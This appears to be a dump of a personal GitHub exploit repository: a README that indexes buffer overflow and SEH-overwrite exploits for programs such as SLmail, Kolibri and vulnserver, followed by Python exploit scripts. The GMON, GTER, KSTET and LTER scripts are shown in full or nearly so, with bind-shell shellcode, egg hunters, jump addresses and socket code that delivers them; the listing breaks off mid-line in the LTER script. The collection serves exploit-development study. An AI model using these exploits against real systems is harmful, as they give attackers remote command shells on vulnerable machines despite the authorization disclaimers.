├── README.md ├── exploit-GMON.py ├── exploit-GTER.py ├── exploit-HTER.py ├── exploit-KSTET.py ├── exploit-LTER.py ├── exploit-TRUN.py ├── exploit-dvdxplayer.py ├── exploit-easy.py ├── exploit-easyrmtomp3converter.py ├── exploit-eureka.py ├── exploit-freefloatftp.py ├── exploit-kolibri.py ├── exploit-mediacoder.py ├── exploit-slmail.py ├── exploit-sysax.py ├── exploit-xitami.py └── h2hc-LTER ├── exploit-LTER-1.py ├── exploit-LTER-2.py ├── exploit-LTER-3.py ├── exploit-LTER-4.py ├── exploit-LTER-5.py ├── exploit-LTER-6.py └── exploit-LTER-7.py /README.md: -------------------------------------------------------------------------------- 1 | # Exploits 2 | 3 | These are some of my exploits written for research purposes. Please read disclaimer section in all of them. 4 | 5 | ## Stack Based Buffer Overflow 6 | 7 | * Seattle Lab Mail (SLmail) 5.5 - [exploit-slmail.py](https://github.com/rafaveira3/exploits/blob/master/exploit-slmail.py) 8 | * Freefloat FTP Server - [exploit-freefloatftp.py](https://github.com/rafaveira3/exploits/blob/master/exploit-freefloatftp.py) 9 | * Easy RM to MP3 Converter 2.7.3.700 - [exploit-easyrmtomp3converter.py](https://github.com/rafaveira3/exploits/blob/master/exploit-easyrmtomp3converter.py) 10 | * DVD X Player 5.5 - [exploit-dvdxplayer.py](https://github.com/rafaveira3/exploits/blob/master/exploit-dvdxplayer.py) 11 | * vulnserver.exe (TRUN) - [exploit-TRUN.py](https://github.com/rafaveira3/exploits/blob/master/exploit-TRUN.py) 12 | * vulnserver.exe (HTER) - [exploit-HTER.py](https://github.com/rafaveira3/exploits/blob/master/exploit-HTER.py) 13 | 14 | ## Stack Based Buffer Overflow (with Egg Hunter) 15 | 16 | * Kolibri v2.0 HTTP Server - [exploit-kolibri.py](https://github.com/rafaveira3/exploits/blob/master/exploit-kolibri.py) - This is [How I wrote it](https://medium.com/@rafaveira3/exploit-development-kolibri-v2-0-http-server-egg-hunter-example-1-5e435aa84879) 17 | * Xitami Web Server 2.5b4 - 
[exploit-xitami.py](https://github.com/rafaveira3/exploits/blob/master/exploit-xitami.py) 18 | * Eureka Email Client - [exploit-eureka.py](https://github.com/rafaveira3/exploits/blob/master/exploit-eureka.py) 19 | * vulnserver.exe (KSTET) - [exploit-KSTET.py](https://github.com/rafaveira3/exploits/blob/master/exploit-KSTET.py) 20 | * vulnserver.exe (GTER) - [exploit-GTER.py](https://github.com/rafaveira3/exploits/blob/master/exploit-GTER.py) 21 | 22 | ## Structured Exception Handler (SEH) Overwrite 23 | 24 | * Sysax 5.53 - [exploit-sysax.py](https://github.com/rafaveira3/exploits/blob/master/exploit-sysax.py) 25 | * Easy RM RMVB to DVD Burner 1.8.11 - [exploit-easy.py](https://github.com/rafaveira3/exploits/blob/master/exploit-easy.py) - This is [How I wrote it](https://medium.com/@rafaveira3/exploit-development-easy-rm-rmvb-to-dvd-burner-1-8-11-seh-overflow-example-1-4b5ac6de5adc) 26 | * MediaCoder 0.8.48.5888 - [exploit-mediacoder.py](https://github.com/rafaveira3/exploits/blob/master/exploit-mediacoder.py) 27 | * vulnserver.exe (GMON) - [exploit-GMON.py](https://github.com/rafaveira3/exploits/blob/master/exploit-GMON.py) 28 | * vulnserver.exe (LTER) - [exploit-LTER.py](https://github.com/rafaveira3/exploits/blob/master/exploit-LTER.py) 29 | -------------------------------------------------------------------------------- /exploit-GMON.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # November 2017 | github.com/rafaveira3 4 | # 5 | # Exploit vulnserver.exe - GMON - Buffer Overflow 6 | # 7 | # How I tested it: 8 | # - Windows XP SP2. 9 | # - Download and install vulnerable service on Windows XP (WARNING! 
THIS IS A VULNERABLE SERVICE) 10 | # - http://sites.google.com/site/lupingreycorner/vulnserver.zip 11 | # 12 | # 13 | # Development Proccess: 14 | # - 15 | # 16 | # PoC: 17 | # Windows XP: 18 | # - Double Click vulnserver.exe 19 | # 20 | # Kali: 21 | # root@kali:~# python exploit-GMON.py 22 | # root@kali:~# nc -nv 10.0.0.35 443 23 | # (UNKNOWN) [10.0.0.35] 443 (https) open 24 | # Microsoft Windows XP [Version 5.1.2600] 25 | # (C) Copyright 1985-2001 Microsoft Corp. 26 | # 27 | # C:\Documents and Settings\rafael\Desktop\WORK\vulnserver> 28 | # 29 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 30 | # Accessing a computer system or network without authorization or explicit permission is illegal. 31 | # 32 | # 33 | 34 | import socket 35 | import os 36 | import sys 37 | 38 | # pop pop ret found at 625010B4 (essfunc.dll) (SafeSEH:False) 39 | seh = "\xB4\x10\x50\x62" 40 | 41 | # jmp back 50 bytes for Egg Hunter 42 | nseh = "\x90\x90\xEB\xCE" 43 | 44 | # mona egg -t r4f4 (egg = r4f4) 45 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" 46 | egghunter += "\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 47 | 48 | # hopefully shellcode will be placed somewhere in memory 49 | shellcode = "r4f4r4f4" 50 | # msfvenom -p windows/shell_bind_tcp -e x86/shikata_ga_nai -b "\x00" LPORT=443 -f python -v shellcode 51 | # Payload Size: 356 Bytes 52 | shellcode += "\xd9\xc7\xbf\x5a\x26\x0a\x71\xd9\x74\x24\xf4\x5a" 53 | shellcode += "\x31\xc9\xb1\x53\x31\x7a\x17\x83\xea\xfc\x03\x20" 54 | shellcode += "\x35\xe8\x84\x28\xd1\x6e\x66\xd0\x22\x0f\xee\x35" 55 | shellcode += "\x13\x0f\x94\x3e\x04\xbf\xde\x12\xa9\x34\xb2\x86" 56 | shellcode += "\x3a\x38\x1b\xa9\x8b\xf7\x7d\x84\x0c\xab\xbe\x87" 57 | shellcode += "\x8e\xb6\x92\x67\xae\x78\xe7\x66\xf7\x65\x0a\x3a" 58 | shellcode += "\xa0\xe2\xb9\xaa\xc5\xbf\x01\x41\x95\x2e\x02\xb6" 59 | shellcode += 
"\x6e\x50\x23\x69\xe4\x0b\xe3\x88\x29\x20\xaa\x92" 60 | shellcode += "\x2e\x0d\x64\x29\x84\xf9\x77\xfb\xd4\x02\xdb\xc2" 61 | shellcode += "\xd8\xf0\x25\x03\xde\xea\x53\x7d\x1c\x96\x63\xba" 62 | shellcode += "\x5e\x4c\xe1\x58\xf8\x07\x51\x84\xf8\xc4\x04\x4f" 63 | shellcode += "\xf6\xa1\x43\x17\x1b\x37\x87\x2c\x27\xbc\x26\xe2" 64 | shellcode += "\xa1\x86\x0c\x26\xe9\x5d\x2c\x7f\x57\x33\x51\x9f" 65 | shellcode += "\x38\xec\xf7\xd4\xd5\xf9\x85\xb7\xb1\xce\xa7\x47" 66 | shellcode += "\x42\x59\xbf\x34\x70\xc6\x6b\xd2\x38\x8f\xb5\x25" 67 | shellcode += "\x3e\xba\x02\xb9\xc1\x45\x73\x90\x05\x11\x23\x8a" 68 | shellcode += "\xac\x1a\xa8\x4a\x50\xcf\x45\x42\xf7\xa0\x7b\xaf" 69 | shellcode += "\x47\x11\x3c\x1f\x20\x7b\xb3\x40\x50\x84\x19\xe9" 70 | shellcode += "\xf9\x79\xa2\x14\x41\xf4\x44\x7c\xa5\x51\xde\xe8" 71 | shellcode += "\x07\x86\xd7\x8f\x78\xec\x4f\x27\x30\xe6\x48\x48" 72 | shellcode += "\xc1\x2c\xff\xde\x4a\x23\x3b\xff\x4c\x6e\x6b\x68" 73 | shellcode += "\xda\xe4\xfa\xdb\x7a\xf8\xd6\x8b\x1f\x6b\xbd\x4b" 74 | shellcode += "\x69\x90\x6a\x1c\x3e\x66\x63\xc8\xd2\xd1\xdd\xee" 75 | shellcode += "\x2e\x87\x26\xaa\xf4\x74\xa8\x33\x78\xc0\x8e\x23" 76 | shellcode += "\x44\xc9\x8a\x17\x18\x9c\x44\xc1\xde\x76\x27\xbb" 77 | shellcode += "\x88\x25\xe1\x2b\x4c\x06\x32\x2d\x51\x43\xc4\xd1" 78 | shellcode += "\xe0\x3a\x91\xee\xcd\xaa\x15\x97\x33\x4b\xd9\x42" 79 | shellcode += "\xf0\x7b\x90\xce\x51\x14\x7d\x9b\xe3\x79\x7e\x76" 80 | shellcode += "\x27\x84\xfd\x72\xd8\x73\x1d\xf7\xdd\x38\x99\xe4" 81 | shellcode += "\xaf\x51\x4c\x0a\x03\x51\x45" 82 | 83 | # evil = junk + nSEH + SEH + junk 84 | evil = "A"*(3495-len(egghunter)) + egghunter + nseh + seh + shellcode + "D"*(493-len(shellcode)) 85 | 86 | data = "GMON /.:/" + evil 87 | 88 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 89 | expl.connect(("10.0.0.35", 9999)) 90 | expl.send(data) 91 | expl.close() 92 | -------------------------------------------------------------------------------- /exploit-GTER.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # November 2017 | github.com/rafaveira3 4 | # 5 | # Exploit vulnserver.exe - GTER - Buffer Overflow 6 | # 7 | # How I tested it: 8 | # - Windows XP SP2. 9 | # - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 10 | # - http://sites.google.com/site/lupingreycorner/vulnserver.zip 11 | # 12 | # 13 | # Development Proccess: 14 | # - 15 | # 16 | # PoC: 17 | # Windows XP: 18 | # - Double Click vulnserver.exe 19 | # 20 | # Kali: 21 | # root@kali:~# python exploit-GTER.py 22 | # root@kali:~# nc -nv 10.10.0.20 443 23 | # (UNKNOWN) [10.10.0.20] 443 (https) open 24 | # Microsoft Windows XP [Version 5.1.2600] 25 | # (C) Copyright 1985-2001 Microsoft Corp. 26 | # 27 | # C:\Documents and Settings\rafael\Desktop\WORK\vulnserver> 28 | # 29 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 30 | # Accessing a computer system or network without authorization or explicit permission is illegal. 
31 | # 32 | # 33 | import socket 34 | import os 35 | import sys 36 | 37 | # jmp esp found at 0x625011af - essfunc.fll 38 | ret = "\xaf\x11\x50\x62" 39 | 40 | # jmp back 50 bytes \xEB\xCE 41 | jmp = "\x90\x90\xEB\xCE" 42 | 43 | # mona egg -t r4f4 (egg = r4f4) 44 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" 45 | egghunter += "\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 46 | 47 | # a few nops 48 | nops = "\x90"*10 49 | 50 | evil = "A"*(147-len(egghunter)-len(nops)) + egghunter + nops + ret + jmp + "C"*(349-len(jmp)) 51 | 52 | data = "GTER /.:/" + evil 53 | 54 | shellcode = "r4f4r4f4" 55 | # msfvenom -p windows/shell_bind_tcp -e x86/shikata_ga_nai -b "\x00" LPORT=443 -f python -v shellcode 56 | # Payload Size: 356 Bytes 57 | shellcode += "\xd9\xc7\xbf\x5a\x26\x0a\x71\xd9\x74\x24\xf4\x5a" 58 | shellcode += "\x31\xc9\xb1\x53\x31\x7a\x17\x83\xea\xfc\x03\x20" 59 | shellcode += "\x35\xe8\x84\x28\xd1\x6e\x66\xd0\x22\x0f\xee\x35" 60 | shellcode += "\x13\x0f\x94\x3e\x04\xbf\xde\x12\xa9\x34\xb2\x86" 61 | shellcode += "\x3a\x38\x1b\xa9\x8b\xf7\x7d\x84\x0c\xab\xbe\x87" 62 | shellcode += "\x8e\xb6\x92\x67\xae\x78\xe7\x66\xf7\x65\x0a\x3a" 63 | shellcode += "\xa0\xe2\xb9\xaa\xc5\xbf\x01\x41\x95\x2e\x02\xb6" 64 | shellcode += "\x6e\x50\x23\x69\xe4\x0b\xe3\x88\x29\x20\xaa\x92" 65 | shellcode += "\x2e\x0d\x64\x29\x84\xf9\x77\xfb\xd4\x02\xdb\xc2" 66 | shellcode += "\xd8\xf0\x25\x03\xde\xea\x53\x7d\x1c\x96\x63\xba" 67 | shellcode += "\x5e\x4c\xe1\x58\xf8\x07\x51\x84\xf8\xc4\x04\x4f" 68 | shellcode += "\xf6\xa1\x43\x17\x1b\x37\x87\x2c\x27\xbc\x26\xe2" 69 | shellcode += "\xa1\x86\x0c\x26\xe9\x5d\x2c\x7f\x57\x33\x51\x9f" 70 | shellcode += "\x38\xec\xf7\xd4\xd5\xf9\x85\xb7\xb1\xce\xa7\x47" 71 | shellcode += "\x42\x59\xbf\x34\x70\xc6\x6b\xd2\x38\x8f\xb5\x25" 72 | shellcode += "\x3e\xba\x02\xb9\xc1\x45\x73\x90\x05\x11\x23\x8a" 73 | shellcode += "\xac\x1a\xa8\x4a\x50\xcf\x45\x42\xf7\xa0\x7b\xaf" 74 | shellcode += 
"\x47\x11\x3c\x1f\x20\x7b\xb3\x40\x50\x84\x19\xe9" 75 | shellcode += "\xf9\x79\xa2\x14\x41\xf4\x44\x7c\xa5\x51\xde\xe8" 76 | shellcode += "\x07\x86\xd7\x8f\x78\xec\x4f\x27\x30\xe6\x48\x48" 77 | shellcode += "\xc1\x2c\xff\xde\x4a\x23\x3b\xff\x4c\x6e\x6b\x68" 78 | shellcode += "\xda\xe4\xfa\xdb\x7a\xf8\xd6\x8b\x1f\x6b\xbd\x4b" 79 | shellcode += "\x69\x90\x6a\x1c\x3e\x66\x63\xc8\xd2\xd1\xdd\xee" 80 | shellcode += "\x2e\x87\x26\xaa\xf4\x74\xa8\x33\x78\xc0\x8e\x23" 81 | shellcode += "\x44\xc9\x8a\x17\x18\x9c\x44\xc1\xde\x76\x27\xbb" 82 | shellcode += "\x88\x25\xe1\x2b\x4c\x06\x32\x2d\x51\x43\xc4\xd1" 83 | shellcode += "\xe0\x3a\x91\xee\xcd\xaa\x15\x97\x33\x4b\xd9\x42" 84 | shellcode += "\xf0\x7b\x90\xce\x51\x14\x7d\x9b\xe3\x79\x7e\x76" 85 | shellcode += "\x27\x84\xfd\x72\xd8\x73\x1d\xf7\xdd\x38\x99\xe4" 86 | shellcode += "\xaf\x51\x4c\x0a\x03\x51\x45" 87 | 88 | # sending shellcode using to GDOG hoping to be stored in memory somewhere 89 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 90 | expl.connect(("10.0.0.35", 9999)) 91 | hope = "GDOG " + shellcode 92 | expl.send(hope) 93 | expl.close() 94 | 95 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 96 | expl.connect(("10.10.0.20", 9999)) 97 | expl.send(data) 98 | expl.close() 99 | -------------------------------------------------------------------------------- /exploit-HTER.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # November 2017 | github.com/rafaveira3 4 | # 5 | # Exploit vulnserver.exe - HTER - Buffer Overflow 6 | # 7 | # How I tested it: 8 | # - Windows XP SP2. 9 | # - Download and install vulnerable service on Windows XP (WARNING! 
THIS IS A VULNERABLE SERVICE) 10 | # - http://sites.google.com/site/lupingreycorner/vulnserver.zip 11 | # 12 | # 13 | # Development Proccess: 14 | # - 15 | # 16 | # PoC: 17 | # Windows XP: 18 | # - Double Click vulnserver.exe 19 | # 20 | # Kali: 21 | # root@kali:~# python exploit-HTER.py 22 | # root@kali:~# nc -nv 10.0.0.35 443 23 | # (UNKNOWN) [10.0.0.35] 443 (https) open 24 | # Microsoft Windows XP [Version 5.1.2600] 25 | # (C) Copyright 1985-2001 Microsoft Corp. 26 | # 27 | # C:\Documents and Settings\rafael\Desktop\WORK\vulnserver> 28 | # 29 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 30 | # Accessing a computer system or network without authorization or explicit permission is illegal. 31 | # 32 | # 33 | 34 | import socket 35 | import os 36 | import sys 37 | 38 | # jmp eax found at 0x625011b1 - essfunc.fll 39 | ret = "B1115062" 40 | 41 | # msfvenom -p windows/shell_bind_tcp -e x86/shikata_ga_nai -b "\x00" LPORT=443 -f hex 42 | # Payload Size: 355 43 | shellcode = "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" 44 | 45 | alignESP = "50" # PUSH EAX 46 | alignESP += "5C" # POP ESP 47 | alignESP += "90"*32 # NOPs 48 | 49 | evil = alignESP + shellcode + "A"*(2040-len(shellcode)-len(alignESP)) + ret + "D"*1152 50 | 51 | data = "HTER 0" + evil 52 | 53 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 54 | expl.connect(("10.0.0.35", 9999)) 55 | expl.send(data) 56 | expl.close() 57 | -------------------------------------------------------------------------------- /exploit-KSTET.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # November 2017 | github.com/rafaveira3 4 | # 5 | # Exploit vulnserver.exe - KSTET - Buffer Overflow 6 | # 7 | # How I tested it: 8 | # - Windows XP SP2. 9 | # - Download and install vulnerable service on Windows XP (WARNING! 
THIS IS A VULNERABLE SERVICE) 10 | # - http://sites.google.com/site/lupingreycorner/vulnserver.zip 11 | # 12 | # 13 | # Development Proccess: 14 | # - 15 | # 16 | # PoC: 17 | # Windows XP: 18 | # - Double Click vulnserver.exe 19 | # 20 | # Kali: 21 | # root@kali:~# python exploit-KSTET.py 22 | # root@kali:~# nc -nv 10.0.0.35 443 23 | # (UNKNOWN) [10.0.0.35] 443 (https) open 24 | # Microsoft Windows XP [Version 5.1.2600] 25 | # (C) Copyright 1985-2001 Microsoft Corp. 26 | # 27 | # C:\Documents and Settings\rafael\Desktop\WORK\vulnserver> 28 | # 29 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 30 | # Accessing a computer system or network without authorization or explicit permission is illegal. 31 | # 32 | # 33 | 34 | import socket 35 | import os 36 | import sys 37 | 38 | # jmp esp found at 625011AF - essfunc.dll 39 | ret = "\xaf\x11\x50\x62" 40 | 41 | # jmp back 50 bytes \xEB\xCE 42 | jmp = "\x90\x90\xEB\xCE" 43 | 44 | # mona egg -t r4f4 (egg = r4f4) 45 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" 46 | egghunter += "\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 47 | 48 | # a few nops 49 | nops = "\x90"*10 50 | 51 | evil = "A"*(66-len(egghunter)-len(nops)) + egghunter + nops + ret + jmp + "C"*(30-len(jmp)) 52 | 53 | data = "KSTET /.:/" + evil 54 | 55 | shellcode = "r4f4r4f4" 56 | # msfvenom -p windows/shell_bind_tcp -e x86/shikata_ga_nai -b "\x00" LPORT=443 -f python -v shellcode 57 | # Payload Size: 356 Bytes 58 | shellcode += "\xd9\xc7\xbf\x5a\x26\x0a\x71\xd9\x74\x24\xf4\x5a" 59 | shellcode += "\x31\xc9\xb1\x53\x31\x7a\x17\x83\xea\xfc\x03\x20" 60 | shellcode += "\x35\xe8\x84\x28\xd1\x6e\x66\xd0\x22\x0f\xee\x35" 61 | shellcode += "\x13\x0f\x94\x3e\x04\xbf\xde\x12\xa9\x34\xb2\x86" 62 | shellcode += "\x3a\x38\x1b\xa9\x8b\xf7\x7d\x84\x0c\xab\xbe\x87" 63 | shellcode += "\x8e\xb6\x92\x67\xae\x78\xe7\x66\xf7\x65\x0a\x3a" 64 | shellcode += 
"\xa0\xe2\xb9\xaa\xc5\xbf\x01\x41\x95\x2e\x02\xb6" 65 | shellcode += "\x6e\x50\x23\x69\xe4\x0b\xe3\x88\x29\x20\xaa\x92" 66 | shellcode += "\x2e\x0d\x64\x29\x84\xf9\x77\xfb\xd4\x02\xdb\xc2" 67 | shellcode += "\xd8\xf0\x25\x03\xde\xea\x53\x7d\x1c\x96\x63\xba" 68 | shellcode += "\x5e\x4c\xe1\x58\xf8\x07\x51\x84\xf8\xc4\x04\x4f" 69 | shellcode += "\xf6\xa1\x43\x17\x1b\x37\x87\x2c\x27\xbc\x26\xe2" 70 | shellcode += "\xa1\x86\x0c\x26\xe9\x5d\x2c\x7f\x57\x33\x51\x9f" 71 | shellcode += "\x38\xec\xf7\xd4\xd5\xf9\x85\xb7\xb1\xce\xa7\x47" 72 | shellcode += "\x42\x59\xbf\x34\x70\xc6\x6b\xd2\x38\x8f\xb5\x25" 73 | shellcode += "\x3e\xba\x02\xb9\xc1\x45\x73\x90\x05\x11\x23\x8a" 74 | shellcode += "\xac\x1a\xa8\x4a\x50\xcf\x45\x42\xf7\xa0\x7b\xaf" 75 | shellcode += "\x47\x11\x3c\x1f\x20\x7b\xb3\x40\x50\x84\x19\xe9" 76 | shellcode += "\xf9\x79\xa2\x14\x41\xf4\x44\x7c\xa5\x51\xde\xe8" 77 | shellcode += "\x07\x86\xd7\x8f\x78\xec\x4f\x27\x30\xe6\x48\x48" 78 | shellcode += "\xc1\x2c\xff\xde\x4a\x23\x3b\xff\x4c\x6e\x6b\x68" 79 | shellcode += "\xda\xe4\xfa\xdb\x7a\xf8\xd6\x8b\x1f\x6b\xbd\x4b" 80 | shellcode += "\x69\x90\x6a\x1c\x3e\x66\x63\xc8\xd2\xd1\xdd\xee" 81 | shellcode += "\x2e\x87\x26\xaa\xf4\x74\xa8\x33\x78\xc0\x8e\x23" 82 | shellcode += "\x44\xc9\x8a\x17\x18\x9c\x44\xc1\xde\x76\x27\xbb" 83 | shellcode += "\x88\x25\xe1\x2b\x4c\x06\x32\x2d\x51\x43\xc4\xd1" 84 | shellcode += "\xe0\x3a\x91\xee\xcd\xaa\x15\x97\x33\x4b\xd9\x42" 85 | shellcode += "\xf0\x7b\x90\xce\x51\x14\x7d\x9b\xe3\x79\x7e\x76" 86 | shellcode += "\x27\x84\xfd\x72\xd8\x73\x1d\xf7\xdd\x38\x99\xe4" 87 | shellcode += "\xaf\x51\x4c\x0a\x03\x51\x45" 88 | 89 | # sending shellcode using to GDOG hoping to be stored in memory somewhere 90 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 91 | expl.connect(("10.0.0.35", 9999)) 92 | hope = "GDOG " + shellcode 93 | expl.send(hope) 94 | expl.close() 95 | 96 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 97 | expl.connect(("10.0.0.35", 9999)) 98 | 
expl.send(data) 99 | expl.close() 100 | -------------------------------------------------------------------------------- /exploit-LTER.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # November 2017 | github.com/rafaveira3 4 | # 5 | # Exploit vulnserver.exe - LTER - Buffer Overflow 6 | # 7 | # How I tested it: 8 | # - Windows XP SP2. 9 | # - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 10 | # - http://sites.google.com/site/lupingreycorner/vulnserver.zip 11 | # 12 | # 13 | # Development Proccess: 14 | # - 15 | # 16 | # PoC: 17 | # Windows XP: 18 | # - Double Click vulnserver.exe 19 | # 20 | # Kali: 21 | # root@kali:~# python exploit-LTER.py 22 | # root@kali:~# nc -nv 10.0.0.35 443 23 | # (UNKNOWN) [10.0.0.35] 443 (https) open 24 | # Microsoft Windows XP [Version 5.1.2600] 25 | # (C) Copyright 1985-2001 Microsoft Corp. 26 | # 27 | # C:\Documents and Settings\rafael\Desktop\WORK\vulnserver> 28 | # 29 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 30 | # Accessing a computer system or network without authorization or explicit permission is illegal. 
31 | # 32 | # 33 | 34 | import socket 35 | import os 36 | import sys 37 | 38 | # POP POP RET found at 6250120b (essfunc.dll - SafeSEH:False) 39 | seh = "\x0B\x12\x50\x62" 40 | 41 | # Jumping -128 bytes (FF will turn into 80) 42 | nseh = "\x4C\x4C\x77\xFF" 43 | 44 | # Fake nops as 90 is a badchar 45 | nops = "A"*120 46 | 47 | egg = "T00WT00W" 48 | # msfvenom -p windows/shell_bind_tcp -e x86/shikata_ga_nai -b "\x00" LPORT=443 -f python -v shellcode 49 | # Payload Size: 356 Bytes 50 | shellcode = egg 51 | shellcode += "\xd9\xc7\xbf\x5a\x26\x0a\x71\xd9\x74\x24\xf4\x5a" 52 | shellcode += "\x31\xc9\xb1\x53\x31\x7a\x17\x83\xea\xfc\x03\x20" 53 | shellcode += "\x35\xe8\x84\x28\xd1\x6e\x66\xd0\x22\x0f\xee\x35" 54 | shellcode += "\x13\x0f\x94\x3e\x04\xbf\xde\x12\xa9\x34\xb2\x86" 55 | shellcode += "\x3a\x38\x1b\xa9\x8b\xf7\x7d\x84\x0c\xab\xbe\x87" 56 | shellcode += "\x8e\xb6\x92\x67\xae\x78\xe7\x66\xf7\x65\x0a\x3a" 57 | shellcode += "\xa0\xe2\xb9\xaa\xc5\xbf\x01\x41\x95\x2e\x02\xb6" 58 | shellcode += "\x6e\x50\x23\x69\xe4\x0b\xe3\x88\x29\x20\xaa\x92" 59 | shellcode += "\x2e\x0d\x64\x29\x84\xf9\x77\xfb\xd4\x02\xdb\xc2" 60 | shellcode += "\xd8\xf0\x25\x03\xde\xea\x53\x7d\x1c\x96\x63\xba" 61 | shellcode += "\x5e\x4c\xe1\x58\xf8\x07\x51\x84\xf8\xc4\x04\x4f" 62 | shellcode += "\xf6\xa1\x43\x17\x1b\x37\x87\x2c\x27\xbc\x26\xe2" 63 | shellcode += "\xa1\x86\x0c\x26\xe9\x5d\x2c\x7f\x57\x33\x51\x9f" 64 | shellcode += "\x38\xec\xf7\xd4\xd5\xf9\x85\xb7\xb1\xce\xa7\x47" 65 | shellcode += "\x42\x59\xbf\x34\x70\xc6\x6b\xd2\x38\x8f\xb5\x25" 66 | shellcode += "\x3e\xba\x02\xb9\xc1\x45\x73\x90\x05\x11\x23\x8a" 67 | shellcode += "\xac\x1a\xa8\x4a\x50\xcf\x45\x42\xf7\xa0\x7b\xaf" 68 | shellcode += "\x47\x11\x3c\x1f\x20\x7b\xb3\x40\x50\x84\x19\xe9" 69 | shellcode += "\xf9\x79\xa2\x14\x41\xf4\x44\x7c\xa5\x51\xde\xe8" 70 | shellcode += "\x07\x86\xd7\x8f\x78\xec\x4f\x27\x30\xe6\x48\x48" 71 | shellcode += "\xc1\x2c\xff\xde\x4a\x23\x3b\xff\x4c\x6e\x6b\x68" 72 | shellcode += 
"\xda\xe4\xfa\xdb\x7a\xf8\xd6\x8b\x1f\x6b\xbd\x4b" 73 | shellcode += "\x69\x90\x6a\x1c\x3e\x66\x63\xc8\xd2\xd1\xdd\xee" 74 | shellcode += "\x2e\x87\x26\xaa\xf4\x74\xa8\x33\x78\xc0\x8e\x23" 75 | shellcode += "\x44\xc9\x8a\x17\x18\x9c\x44\xc1\xde\x76\x27\xbb" 76 | shellcode += "\x88\x25\xe1\x2b\x4c\x06\x32\x2d\x51\x43\xc4\xd1" 77 | shellcode += "\xe0\x3a\x91\xee\xcd\xaa\x15\x97\x33\x4b\xd9\x42" 78 | shellcode += "\xf0\x7b\x90\xce\x51\x14\x7d\x9b\xe3\x79\x7e\x76" 79 | shellcode += "\x27\x84\xfd\x72\xd8\x73\x1d\xf7\xdd\x38\x99\xe4" 80 | shellcode += "\xaf\x51\x4c\x0a\x03\x51\x45" 81 | 82 | # First stage encoded egghunter 83 | # Payload Size: 124 Bytes 84 | egghunter1 = "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x54\x58\x05\x50\x11\x01" 85 | egghunter1 += "\x01\x05\x41\x01\x01\x01\x2D\x01\x01\x02\x02\x50\x5C\x41\x41\x25" 86 | egghunter1 += "\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x21\x55\x55\x55\x2D\x21" 87 | egghunter1 += "\x54\x55\x55\x2D\x49\x6F\x55\x6D\x50\x41\x41\x25\x4A\x4D\x4E\x55" 88 | egghunter1 += "\x25\x35\x32\x31\x2A\x2D\x71\x21\x61\x75\x2D\x71\x21\x61\x75\x2D" 89 | egghunter1 += "\x6F\x47\x53\x65\x50\x41\x41\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31" 90 | egghunter1 += "\x2A\x2D\x44\x41\x7E\x58\x2D\x44\x34\x7E\x58\x2D\x48\x33\x78\x54" 91 | egghunter1 += "\x41\x41\x41\x41\x41\x41\x41\x41\x71\x06\x70\x04" # JMP FRONT 92 | 93 | # Second stage encoded egghunter 94 | # Payload Size: 120 Bytes 95 | egghunter2 = "\x50\x41\x41\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x71\x7A" 96 | egghunter2 += "\x31\x45\x2D\x31\x7A\x31\x45\x2D\x6F\x52\x48\x45\x50\x41\x41\x25" 97 | egghunter2 += "\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x33\x73\x31\x2D\x2D\x33" 98 | egghunter2 += "\x33\x31\x2D\x2D\x5E\x54\x43\x31\x50\x41\x41\x25\x4A\x4D\x4E\x55" 99 | egghunter2 += "\x25\x35\x32\x31\x2A\x2D\x45\x31\x77\x45\x2D\x45\x31\x47\x45\x2D" 100 | egghunter2 += "\x74\x45\x74\x46\x50\x41\x41\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31" 101 | egghunter2 += 
